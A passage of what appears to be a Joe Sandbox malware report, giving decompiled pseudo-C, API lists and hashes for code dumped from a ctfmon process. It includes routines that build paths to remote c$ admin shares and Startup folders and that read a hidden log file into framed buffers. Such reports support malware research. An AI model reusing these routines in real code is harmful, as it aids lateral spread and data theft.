                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0097A660,00000001,00000001,?,00990E80,?,?), ref: 0097A4EF
                                                • __alloca_probe_16.LIBCMT ref: 0097A586
                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,00990E80,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0097A5E9
                                                • __freea.LIBCMT ref: 0097A5F6
                                                  • Part of subcall function 00977882: RtlAllocateHeap.NTDLL(00000000,77109EB0,00000000,?,00970A9A,77109EB0,?,00969C60,00000100,?,77109EB0), ref: 009778B4
                                                • __freea.LIBCMT ref: 0097A5FF
                                                • __freea.LIBCMT ref: 0097A624
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                • String ID: /LU5/
                                                • API String ID: 3864826663-937868281
                                                • Opcode ID: c4b8a47a4c46708481c5d4f88227bc15f04db3d3b72e3c92fb3242ad48ab480c
                                                • Instruction ID: c04ace08d18f21e0c52579fe6724e848ffff453b6cf153d18a8427662c21a1e2
                                                • Opcode Fuzzy Hash: c4b8a47a4c46708481c5d4f88227bc15f04db3d3b72e3c92fb3242ad48ab480c
                                                • Instruction Fuzzy Hash: D051BD73610216AFDB259F64CC45FAF77A9EBC4750F258628FC0CD6190EB74DC809AA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 71%
                                                			E00964E60(CHAR* __ecx, void** __edx, struct _OVERLAPPED** _a4) {
                                                				void** _v12;
                                                				long _v16;
                                                				long _v20;
                                                				struct _OVERLAPPED* _v28;
                                                				struct _OVERLAPPED* _v32;
                                                				void* __edi;
                                                				struct _OVERLAPPED* _t19;
                                                				void** _t22;
                                                				long _t29;
                                                				void* _t31;
                                                				long _t33;
                                                				void** _t36;
                                                				struct _OVERLAPPED** _t37;
                                                				long _t40;
                                                
                                                				_t36 = __edx;
                                                				_v12 = __edx;
                                                				_t31 = CreateFileA(__ecx, 0x80000000, 1, 0, 3, 0x80, 0);
                                                				if(_t31 == 0xffffffff) {
                                                					L3:
                                                					return 0;
                                                				} else {
                                                					_v32 = 0;
                                                					_v28 = 0;
                                                					__imp__GetFileSizeEx(_t31,  &_v32);
                                                					_t19 = _v32;
                                                					_v20 = _t19;
                                                					_t7 =  &(_t19->Internal); // 0x1
                                                					_t39 = _t7;
                                                					 *_t36 = LocalAlloc(0x40, _t7);
                                                					E00973440(_t36, _t20, 0, _t39);
                                                					_t22 = _t36;
                                                					if( *_t22 != 0) {
                                                						_t37 = _a4;
                                                						_t33 = _v20;
                                                						_t40 = _t33;
                                                						 *_t37 = 0;
                                                						if(_t33 > 0) {
                                                							while(1) {
                                                								_v16 = 0;
                                                								ReadFile(_t31,  *_t22, _t40,  &_v16, 0);
                                                								_t29 = _v16;
                                                								if(_t29 == 0) {
                                                									break;
                                                								}
                                                								 *_t37 =  *_t37 + _t29;
                                                								_t40 = _t40 - _t29;
                                                								_t22 = _v12;
                                                								if(_t40 > 0) {
                                                									continue;
                                                								}
                                                								break;
                                                							}
                                                							_t33 = _v20;
                                                						}
                                                						_push(_t31);
                                                						if( *_t37 == _t33) {
                                                							CloseHandle();
                                                							return 1;
                                                						} else {
                                                							CloseHandle();
                                                							LocalFree( *_v12);
                                                							return 0;
                                                						}
                                                					} else {
                                                						CloseHandle(_t31);
                                                						goto L3;
                                                					}
                                                				}
                                                			}


















                                                APIs
                                                • CreateFileA.KERNEL32(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000080,00000000,?,73B76490), ref: 00964E81
                                                • GetFileSizeEx.KERNEL32(00000000,00000000,?,73B76490), ref: 00964EA1
                                                • LocalAlloc.KERNEL32(00000040,00000001,?,73B76490), ref: 00964EB3
                                                • CloseHandle.KERNEL32(00000000,?,73B76490), ref: 00964ECF
                                                • ReadFile.KERNEL32(00000000,?,00000000,?,00000000,?,73B76490), ref: 00964F01
                                                • CloseHandle.KERNEL32(00000000,?,73B76490), ref: 00964F21
                                                • LocalFree.KERNEL32(?,?,73B76490), ref: 00964F2C
                                                • CloseHandle.KERNEL32(00000000,?,73B76490), ref: 00964F3B
                                                Strings
                                                • C:\Windows\system32\msvcwme.log, xrefs: 00964E7D
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CloseFileHandle$Local$AllocCreateFreeReadSize
                                                • String ID: C:\Windows\system32\msvcwme.log
                                                • API String ID: 47662278-2357825738
                                                • Opcode ID: 448f9129ac5d52e61c0e280c196b65a951f4d527edc10945ce20b514677d0119
                                                • Instruction ID: 5328c8f166c1dbbcd0f6be2e5705117d2fb4635f0991b2263891e34990ca29a6
                                                • Opcode Fuzzy Hash: 448f9129ac5d52e61c0e280c196b65a951f4d527edc10945ce20b514677d0119
                                                • Instruction Fuzzy Hash: BE31D375A14219AFDB108FA9EC8DBAEBBB8FF48321F110155F908E7380D7719814CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 74%
                                                			E0097D142(void* __ebx, void* __edi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                                				signed int _v8;
                                                				signed char _v15;
                                                				char _v16;
                                                				void _v24;
                                                				short _v28;
                                                				char _v31;
                                                				void _v32;
                                                				long _v36;
                                                				intOrPtr _v40;
                                                				void* _v44;
                                                				signed int _v48;
                                                				signed char* _v52;
                                                				long _v56;
                                                				int _v60;
                                                				void* __esi;
                                                				signed int _t78;
                                                				signed int _t80;
                                                				int _t86;
                                                				void* _t94;
                                                				long _t97;
                                                				void _t105;
                                                				void* _t112;
                                                				signed int _t116;
                                                				signed int _t118;
                                                				signed char _t123;
                                                				signed char _t128;
                                                				intOrPtr _t129;
                                                				signed int _t131;
                                                				signed char* _t133;
                                                				intOrPtr* _t134;
                                                				signed int _t135;
                                                				void* _t136;
                                                
                                                				_t78 =  *0x98f008; // 0x35554c2f
                                                				_v8 = _t78 ^ _t135;
                                                				_t80 = _a8;
                                                				_t118 = _t80 >> 6;
                                                				_t116 = (_t80 & 0x0000003f) * 0x30;
                                                				_t133 = _a12;
                                                				_v52 = _t133;
                                                				_v48 = _t118;
                                                				_t9 = _t116 + 0x18; // 0xcccccccc
                                                				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x996480 + _t118 * 4)) + _t9));
                                                				_v40 = _a16 + _t133;
                                                				_t86 = GetConsoleCP();
                                                				_t134 = _a4;
                                                				_v60 = _t86;
                                                				 *_t134 = 0;
                                                				 *((intOrPtr*)(_t134 + 4)) = 0;
                                                				 *((intOrPtr*)(_t134 + 8)) = 0;
                                                				while(_t133 < _v40) {
                                                					_v28 = 0;
                                                					_v31 =  *_t133;
                                                					_t129 =  *((intOrPtr*)(0x996480 + _v48 * 4));
                                                					_t123 =  *(_t129 + _t116 + 0x2d);
                                                					if((_t123 & 0x00000004) == 0) {
                                                						if(( *(E0097C178(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                                                							_push(1);
                                                							_push(_t133);
                                                							goto L8;
                                                						} else {
                                                							if(_t133 >= _v40) {
                                                								_t131 = _v48;
                                                								 *((char*)( *((intOrPtr*)(0x996480 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
                                                								 *( *((intOrPtr*)(0x996480 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x996480 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
                                                								 *((intOrPtr*)(_t134 + 4)) =  *((intOrPtr*)(_t134 + 4)) + 1;
                                                							} else {
                                                								_t112 = E00978950( &_v28, _t133, 2);
                                                								_t136 = _t136 + 0xc;
                                                								if(_t112 != 0xffffffff) {
                                                									_t133 =  &(_t133[1]);
                                                									goto L9;
                                                								}
                                                							}
                                                						}
                                                					} else {
                                                						_t128 = _t123 & 0x000000fb;
                                                						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
                                                						_push(2);
                                                						_v15 = _t128;
                                                						 *(_t129 + _t116 + 0x2d) = _t128;
                                                						_push( &_v16);
                                                						L8:
                                                						_push( &_v28);
                                                						_t94 = E00978950();
                                                						_t136 = _t136 + 0xc;
                                                						if(_t94 != 0xffffffff) {
                                                							L9:
                                                							_t133 =  &(_t133[1]);
                                                							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                                                							_v56 = _t97;
                                                							if(_t97 != 0) {
                                                								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
                                                									L19:
                                                									 *_t134 = GetLastError();
                                                								} else {
                                                									 *((intOrPtr*)(_t134 + 4)) =  *((intOrPtr*)(_t134 + 8)) - _v52 + _t133;
                                                									if(_v36 >= _v56) {
                                                										if(_v31 != 0xa) {
                                                											goto L16;
                                                										} else {
                                                											_t105 = 0xd;
                                                											_v32 = _t105;
                                                											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                                                												goto L19;
                                                											} else {
                                                												if(_v36 >= 1) {
                                                													 *((intOrPtr*)(_t134 + 8)) =  *((intOrPtr*)(_t134 + 8)) + 1;
                                                													 *((intOrPtr*)(_t134 + 4)) =  *((intOrPtr*)(_t134 + 4)) + 1;
                                                													goto L16;
                                                												}
                                                											}
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                					goto L20;
                                                					L16:
                                                				}
                                                				L20:
                                                				return E00970A5D(_v8 ^ _t135, _t134);
                                                			}




































                                                APIs
                                                • GetConsoleCP.KERNEL32(00000010,0096971E,08A10000,?,?,?,?,?,?,0097D8B7,00000000,0096971E,00000010,0096971E,0096971E,?), ref: 0097D184
                                                • __fassign.LIBCMT ref: 0097D1FF
                                                • __fassign.LIBCMT ref: 0097D21A
                                                • WideCharToMultiByte.KERNEL32(?,00000000,0096971E,00000001,00000010,00000005,00000000,00000000), ref: 0097D240
                                                • WriteFile.KERNEL32(?,00000010,00000000,0097D8B7,00000000,?,?,?,?,?,?,?,?,?,0097D8B7,00000000), ref: 0097D25F
                                                • WriteFile.KERNEL32(?,00000000,00000001,0097D8B7,00000000,?,?,?,?,?,?,?,?,?,0097D8B7,00000000), ref: 0097D298
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                • String ID: /LU5/
                                                • API String ID: 1324828854-937868281
                                                • Opcode ID: 60c37837ef75bf970b37e8b7366b118b0d6875fae9bab833961bd2aeefef087f
                                                • Instruction ID: 86da9ff115920d2398e6c949e9371ef8bd52b47f99217f49b27d4889a6c2c7d2
                                                • Opcode Fuzzy Hash: 60c37837ef75bf970b37e8b7366b118b0d6875fae9bab833961bd2aeefef087f
                                                • Instruction Fuzzy Hash: B851C6729142099FDB10CFA8DC45AEEBBF8FF49700F14851AE969E7252D730D942CB64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E00968A40(void* __ecx, void* __eflags, intOrPtr _a4, char _a8) {
                                                				long _v8;
                                                				char _v16;
                                                				char _v20;
                                                				struct _CRITICAL_SECTION _v44;
                                                				long _v48;
                                                				long _v52;
                                                				void* _v56;
                                                				char _v60;
                                                				signed int _t45;
                                                				char _t53;
                                                				void* _t60;
                                                				void* _t84;
                                                				void* _t96;
                                                				void* _t100;
                                                				signed int _t102;
                                                
                                                				_push(0xffffffff);
                                                				_push(E009846F8);
                                                				_push( *[fs:0x0]);
                                                				_t45 =  *0x98f008; // 0x35554c2f
                                                				_push(_t45 ^ _t102);
                                                				 *[fs:0x0] =  &_v16;
                                                				_t96 = __ecx;
                                                				_v60 = 0x98cab8;
                                                				_v48 = 0;
                                                				_v56 = 0;
                                                				_v52 = 0;
                                                				InitializeCriticalSection( &_v44);
                                                				_v8 = 0;
                                                				EnterCriticalSection( &_v44);
                                                				_v52 = _v56;
                                                				E00968840( &_v60, 0x400);
                                                				LeaveCriticalSection( &_v44);
                                                				_t53 = _a8;
                                                				if(_t53 == 0 || _a4 == 0) {
                                                					EnterCriticalSection( &_v44);
                                                					_t28 = ( ==  ? 0 : _v52 - _v56) + 5; // 0x5
                                                					if(E009687B0( &_v60, _t28) != 0xffffffff) {
                                                						_t31 = _t96 + 0x214; // 0x2a0073
                                                						 *_v52 =  *_t31;
                                                						_t33 = _t96 + 0x218; // 0x0
                                                						 *((char*)(_v52 + 4)) =  *_t33;
                                                						_v52 = _v52 + 5;
                                                					}
                                                					LeaveCriticalSection( &_v44);
                                                				} else {
                                                					_v20 = _t53 + 0xd;
                                                					_t17 = _t96 + 0x214; // 0x98cccc
                                                					E00968690( &_v60, _t17, 5);
                                                					E00968690( &_v60,  &_v20, 4);
                                                					E00968690( &_v60,  &_a8, 4);
                                                					E00968690( &_v60, _a4, _a8);
                                                				}
                                                				_t82 =  ==  ? 0 : _v52 - _v56;
                                                				_push( ==  ? 0 : _v52 - _v56);
                                                				_t60 = E009689D0(_t96, _v56,  ==  ? 0 : _v52 - _v56);
                                                				_t84 = _v56;
                                                				_t100 = _t60;
                                                				_v60 = 0x98cab8;
                                                				if(_t84 != 0) {
                                                					VirtualFree(_t84, 0, 0x8000);
                                                				}
                                                				DeleteCriticalSection( &_v44);
                                                				 *[fs:0x0] = _v16;
                                                				return _t100;
                                                			}



















                                                APIs
                                                • InitializeCriticalSection.KERNEL32(?), ref: 00968A89
                                                • EnterCriticalSection.KERNEL32(?), ref: 00968A9A
                                                • LeaveCriticalSection.KERNEL32(?,00000400), ref: 00968ABD
                                                • EnterCriticalSection.KERNEL32(?), ref: 00968B13
                                                • LeaveCriticalSection.KERNEL32(?,00000005), ref: 00968B58
                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00000000), ref: 00968B8B
                                                • DeleteCriticalSection.KERNEL32(?,00000000,00000000,00000000), ref: 00968B95
                                                  • Part of subcall function 00968690: EnterCriticalSection.KERNEL32(?,?,?,?,?,00968C1E,?,00967B57,35554C2F,73B76490,00000000,?), ref: 0096869C
                                                  • Part of subcall function 00968690: LeaveCriticalSection.KERNEL32(?,?,?,00968C1E,?,00967B57,35554C2F,73B76490,00000000,?), ref: 009686C5
                                                  • Part of subcall function 00968690: LeaveCriticalSection.KERNEL32(?,73B76490,00000000,?,?,?,?,?,?,?,?,?,00984728,000000FF,?,00967B57), ref: 009686E7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CriticalSection$Leave$Enter$DeleteFreeInitializeVirtual
                                                • String ID: /LU5/
                                                • API String ID: 2514474324-937868281
                                                • Opcode ID: 132484b71248717c75363ebf29bca7c48f27a6ee3e1fa67be14923199402b79f
                                                • Instruction ID: 018e980cd18d05670314b9f429f1fcea9681b4946277320031d204c933c62ab2
                                                • Opcode Fuzzy Hash: 132484b71248717c75363ebf29bca7c48f27a6ee3e1fa67be14923199402b79f
                                                • Instruction Fuzzy Hash: 7F410CB1A10609ABCF04DFA8D895FDEBBB8FF48310F15462AF515E7290DB74A908CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E009688D0(intOrPtr* __ecx) {
                                                				intOrPtr* _v8;
                                                				long _v12;
                                                				long _v16;
                                                				struct _SECURITY_ATTRIBUTES* _t34;
                                                				CHAR* _t36;
                                                				void* _t37;
                                                				intOrPtr _t39;
                                                				intOrPtr* _t41;
                                                				void* _t43;
                                                				struct _SECURITY_ATTRIBUTES* _t44;
                                                				long _t45;
                                                
                                                				_t44 = 0;
                                                				_t36 = __ecx + 0x110;
                                                				_v8 = __ecx;
                                                				_t43 = CreateFileA(_t36, 0x80000000, 1, 0, 3, 0x80, 0);
                                                				if(_t43 != 0xffffffff) {
                                                					L3:
                                                					_t39 = _v8;
                                                					_t4 = _t39 + 8; // 0x968e40
                                                					_t5 = _t39 + 0xc; // 0x968ec0
                                                					_t45 =  *_t5;
                                                					_v12 =  *_t4;
                                                					SetFilePointer(_t43, _t45,  &_v12, 0);
                                                					_t37 = LocalAlloc(0x40, 0x19000);
                                                					_t9 = _t37 + 9; // 0x9
                                                					 *_t37 = 0x33;
                                                					 *((intOrPtr*)(_t37 + 1)) = _v12;
                                                					 *(_t37 + 5) = _t45;
                                                					_v16 = 0;
                                                					ReadFile(_t43, _t9, 0x18ff7,  &_v16, 0);
                                                					CloseHandle(_t43);
                                                					_t27 = _v16;
                                                					_t41 = _v8;
                                                					if(_v16 == 0) {
                                                						 *((intOrPtr*)( *((intOrPtr*)( *_t41)) + 0x18))();
                                                						return LocalFree(_t37);
                                                					}
                                                					E00968A40(_t41, _t27 + 9, _t37, _t27 + 9);
                                                					return LocalFree(_t37);
                                                				} else {
                                                					while(1) {
                                                						_t34 = _t44;
                                                						_t44 =  &(_t44->nLength);
                                                						if(_t34 > 0xa) {
                                                							break;
                                                						}
                                                						Sleep(0x12c);
                                                						_t43 = CreateFileA(_t36, 0x80000000, 1, 0, 3, 0x80, 0);
                                                						if(_t43 == 0xffffffff) {
                                                							continue;
                                                						} else {
                                                							goto L3;
                                                						}
                                                						goto L7;
                                                					}
                                                					return _t34;
                                                				}
                                                				L7:
                                                			}

                                                APIs
                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,00984635,?,00968D80), ref: 009688F7
                                                • Sleep.KERNEL32(0000012C,?,00968D80), ref: 00968915
                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00968D80), ref: 0096892E
                                                • SetFilePointer.KERNEL32(00000000,00968EC0,00968D80,00000000,?,00968D80), ref: 0096894F
                                                • LocalAlloc.KERNEL32(00000040,00019000,?,00968D80), ref: 0096895C
                                                • ReadFile.KERNEL32(00000000,00000009,00018FF7,?,00000000), ref: 00968987
                                                • CloseHandle.KERNEL32(00000000), ref: 0096898E
                                                • LocalFree.KERNEL32(00000000,00000000,-00000009), ref: 009689A9
                                                • LocalFree.KERNEL32(00000000), ref: 009689BE
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: File$Local$CreateFree$AllocCloseHandlePointerReadSleep
                                                • String ID:
                                                • API String ID: 2044486136-0
                                                • Opcode ID: d177e0517aff15d8f1d0443f3996edfaac4f61b717afb2960c470d9135931596
                                                • Instruction ID: f4a3b4dbcdb5b1b38a0e6575790a4aff249de27c13dd898c92cb7d4611118253
                                                • Opcode Fuzzy Hash: d177e0517aff15d8f1d0443f3996edfaac4f61b717afb2960c470d9135931596
                                                • Instruction Fuzzy Hash: 6031C176644204BFD710DBA4DC89FAABBBCEB09720F104195FA05EB2D0CAB09905CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 82%
                                                			E0097C425(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                                				signed int _v8;
                                                				int _v12;
                                                				char _v16;
                                                				intOrPtr _v24;
                                                				char _v28;
                                                				void* _v40;
                                                				void* __esi;
                                                				signed int _t34;
                                                				signed int _t40;
                                                				int _t46;
                                                				int _t53;
                                                				void* _t55;
                                                				int _t57;
                                                				signed int _t63;
                                                				int _t67;
                                                				short* _t68;
                                                				signed int _t69;
                                                				short* _t70;
                                                
                                                				_t34 =  *0x98f008; // 0x35554c2f
                                                				_v8 = _t34 ^ _t69;
                                                				E00974970(__ebx,  &_v28, __edx, _a4);
                                                				_t57 = _a24;
                                                				if(_t57 == 0) {
                                                					_t53 =  *(_v24 + 8);
                                                					_t57 = _t53;
                                                					_a24 = _t53;
                                                				}
                                                				_t67 = 0;
                                                				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                				_v12 = _t40;
                                                				if(_t40 == 0) {
                                                					L15:
                                                					if(_v16 != 0) {
                                                						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                                					}
                                                					return E00970A5D(_v8 ^ _t69, _t68);
                                                				}
                                                				_t55 = _t40 + _t40;
                                                				_t17 = _t55 + 8; // 0x990e88
                                                				asm("sbb eax, eax");
                                                				if((_t17 & _t40) == 0) {
                                                					_t68 = 0;
                                                					L11:
                                                					if(_t68 != 0) {
                                                						E00973440(_t67, _t68, _t67, _t55);
                                                						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t68, _v12);
                                                						if(_t46 != 0) {
                                                							_t67 = GetStringTypeW(_a8, _t68, _t46, _a20);
                                                						}
                                                					}
                                                					L14:
                                                					E0097A677(_t68);
                                                					goto L15;
                                                				}
                                                				_t20 = _t55 + 8; // 0x990e88
                                                				asm("sbb eax, eax");
                                                				_t48 = _t40 & _t20;
                                                				_t21 = _t55 + 8; // 0x990e88
                                                				_t63 = _t21;
                                                				if((_t40 & _t20) > 0x400) {
                                                					asm("sbb eax, eax");
                                                					_t68 = E00977882(_t63, _t48 & _t63);
                                                					if(_t68 == 0) {
                                                						goto L14;
                                                					}
                                                					 *_t68 = 0xdddd;
                                                					L9:
                                                					_t68 =  &(_t68[4]);
                                                					goto L11;
                                                				}
                                                				asm("sbb eax, eax");
                                                				E00983C70();
                                                				_t68 = _t70;
                                                				if(_t68 == 0) {
                                                					goto L14;
                                                				}
                                                				 *_t68 = 0xcccc;
                                                				goto L9;
                                                			}

                                                APIs
                                                • MultiByteToWideChar.KERNEL32(123,00000000,?,?,00000000,00000000,?,77109EB0,?,123,00000001,?,?,00000001,?,?), ref: 0097C472
                                                • __alloca_probe_16.LIBCMT ref: 0097C4AA
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0097C4FB
                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0097C50D
                                                • __freea.LIBCMT ref: 0097C516
                                                  • Part of subcall function 00977882: RtlAllocateHeap.NTDLL(00000000,77109EB0,00000000,?,00970A9A,77109EB0,?,00969C60,00000100,?,77109EB0), ref: 009778B4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                • String ID: /LU5/$123
                                                • API String ID: 313313983-4225885196
                                                • Opcode ID: 8d8c0b4ce09a1fea828b7852636dcefbbfee14f9dc659d823e347f856b2c9254
                                                • Instruction ID: 1f6a2922c028ec83f401e35a39ef8f060b69ab2a6f59c2ede02855e1344c5a72
                                                • Opcode Fuzzy Hash: 8d8c0b4ce09a1fea828b7852636dcefbbfee14f9dc659d823e347f856b2c9254
                                                • Instruction Fuzzy Hash: BF31E1B2A1020AABDF259F64DC49EAE7BA9EB40750F14812CFC18D7260E735DD54CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 55%
                                                			E0096AC00(void* __ebx, char* __ecx, void* __edi, signed int _a8) {
                                                				signed int _v8;
                                                				char _v2052;
                                                				short _v2060;
                                                				char _v2564;
                                                				short _v2572;
                                                				char _v3098;
                                                				void _v3100;
                                                				char _v3340;
                                                				char _v3348;
                                                				char _v3352;
                                                				short _v3356;
                                                				intOrPtr _v3360;
                                                				void* __esi;
                                                				signed int _t22;
                                                				int _t26;
                                                				void* _t30;
                                                				void* _t48;
                                                				char* _t65;
                                                				void* _t66;
                                                				void* _t68;
                                                				signed int _t69;
                                                				signed int _t71;
                                                				void* _t72;
                                                
                                                				_t71 = (_t69 & 0xfffffff8) - 0xd1c;
                                                				_t22 =  *0x98f008; // 0x35554c2f
                                                				_v8 = _t22 ^ _t71;
                                                				_push(__edi);
                                                				_t65 = __ecx;
                                                				E00973440(__edi,  &_v3356, 0, 0x100);
                                                				_t60 = MultiByteToWideChar;
                                                				_t72 = _t71 + 0xc;
                                                				_t26 = MultiByteToWideChar(0, 0, _t65, 0xffffffff, 0, 0);
                                                				if(_t26 <= 0x80) {
                                                					MultiByteToWideChar(0, 0, _t65, 0xffffffff,  &_v3356, _t26);
                                                				}
                                                				_t48 = L"c$\\Documents and Settings\\";
                                                				_v3360 = 4;
                                                				do {
                                                					E00973440(_t60,  &_v3098, 0, 0x206);
                                                					_t66 = _t48;
                                                					_t30 = memcpy( &_v3100, _t66, 0x40 << 2);
                                                					_t60 = _t66 + 0x80;
                                                					E00973440(_t66 + 0x80, _t30, 0, 0x800);
                                                					wsprintfW( &_v2060, L"\\\\%ws\\%ws",  &_v3356,  &_v3100);
                                                					E0096AA40(_t48,  &_v2052,  &_v3348, _t66 + 0x80);
                                                					_t72 = _t72 + 0x34;
                                                					_t48 = _t48 + 0x100;
                                                					_t14 =  &_v3352;
                                                					 *_t14 = _v3352 - 1;
                                                				} while ( *_t14 != 0);
                                                				E00973440(_t60,  &_v2572, 0, 0x208);
                                                				wsprintfW( &_v2572, L"\\\\%ws\\%ws",  &_v3348, L"c$\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup");
                                                				E0096A760(_t48,  &_v2564,  &_v3340, _t60);
                                                				_pop(_t68);
                                                				return E00970A5D(_a8 ^ _t72 + 0x1c, _t68);
                                                			}

                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?), ref: 0096AC44
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 0096AC5A
                                                • wsprintfW.USER32 ref: 0096ACCE
                                                • wsprintfW.USER32 ref: 0096AD25
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWidewsprintf
                                                • String ID: /LU5/$\\%ws\%ws$c$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
                                                • API String ID: 1452142677-1121874209
                                                • Opcode ID: 0087d553bfce0b1490dd3aa9d377ddfb504f6352f20dfab29afd7e5c18ab22b4
                                                • Instruction ID: e13b1b9ed37155111b8026a8bdab311ff245dd63657fc95a73aaf637f85a62f4
                                                • Opcode Fuzzy Hash: 0087d553bfce0b1490dd3aa9d377ddfb504f6352f20dfab29afd7e5c18ab22b4
                                                • Instruction Fuzzy Hash: 783189B25443046BD630EB50DC46FDB73DCEF84714F144929FA58A71C1EAB4A6188BE7
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 68%
                                                			E00973060(void* __ebx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                				char _v5;
                                                				signed int _v12;
                                                				char _v16;
                                                				intOrPtr _v20;
                                                				intOrPtr _v24;
                                                				intOrPtr _v28;
                                                				long _v32;
                                                				WCHAR* _v36;
                                                				struct HINSTANCE__* _v40;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* _t54;
                                                				long _t56;
                                                				signed int _t62;
                                                				intOrPtr _t63;
                                                				void* _t64;
                                                				intOrPtr _t67;
                                                				long _t69;
                                                				intOrPtr _t72;
                                                				intOrPtr _t74;
                                                				signed int _t76;
                                                				char _t78;
                                                				void* _t90;
                                                				intOrPtr _t91;
                                                				WCHAR* _t93;
                                                				intOrPtr _t96;
                                                				long _t98;
                                                				intOrPtr* _t100;
                                                				void* _t103;
                                                				void* _t104;
                                                				void* _t110;
                                                
                                                				_t72 = _a8;
                                                				_push(_t90);
                                                				_v5 = 0;
                                                				_t96 = _t72 + 0x10;
                                                				_push(_t96);
                                                				_v16 = 1;
                                                				_v20 = _t96;
                                                				_v12 =  *(_t72 + 8) ^  *0x98f008;
                                                				_t54 = E00973020(_t90, _t96,  *(_t72 + 8) ^  *0x98f008);
                                                				_t91 = _a12;
                                                				_push(_t91);
                                                				E00971802(_t54);
                                                				_t56 = _a4;
                                                				_t104 = _t103 + 0xc;
                                                				if(( *(_t56 + 4) & 0x00000066) != 0) {
                                                					__eflags =  *((intOrPtr*)(_t72 + 0xc)) - 0xfffffffe;
                                                					if( *((intOrPtr*)(_t72 + 0xc)) != 0xfffffffe) {
                                                						E00974097(_t72, 0xfffffffe, _t96, "/LU5/");
                                                						goto L18;
                                                					}
                                                					goto L19;
                                                				} else {
                                                					_v32 = _t56;
                                                					_v28 = _t91;
                                                					_t91 =  *((intOrPtr*)(_t72 + 0xc));
